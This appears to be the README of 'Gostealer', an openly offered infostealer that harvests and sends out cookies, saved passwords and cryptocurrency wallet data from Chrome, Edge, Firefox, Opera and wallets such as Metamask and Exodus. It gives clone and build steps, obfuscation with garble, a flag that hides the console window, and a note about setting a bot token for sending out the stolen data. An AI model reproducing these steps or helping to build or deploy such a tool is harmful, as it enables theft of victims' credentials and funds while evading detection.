Gostealer decodes and sends all cookies, passwords and cryptocurrency wallets from chromium (and not only) browsers.

Supported browsers
- Chrome
- Edge
- Firefox
- Opera
- OperaGX
Supported cryptocurrency wallets
- Atomic
- Binancechain
- Electrum
- Exodus
- Metamask
- Phantom
- Ronin
- Tronlink
From source
# You must have git preinstalled
git clone https://github.com/4kord/gostealer.git
# For Debian (Ubuntu, Xubuntu etc)
apt install golang
# For Arch (Endeavour, Manjaro etc)
pacman -S golang
# For macOS
brew install golang
# Change current directory to the cloned one and build
cd gostealer
garble -seed=random build
# If you don't want to show the terminal use -ldflags -H=windowsgui
garble -seed=random build -ldflags -H=windowsguid
And that's it!
Look at this repository to find out how to install garble
You might want to change bot token and archive password before building.
Rename .env.example to .env and change values you need.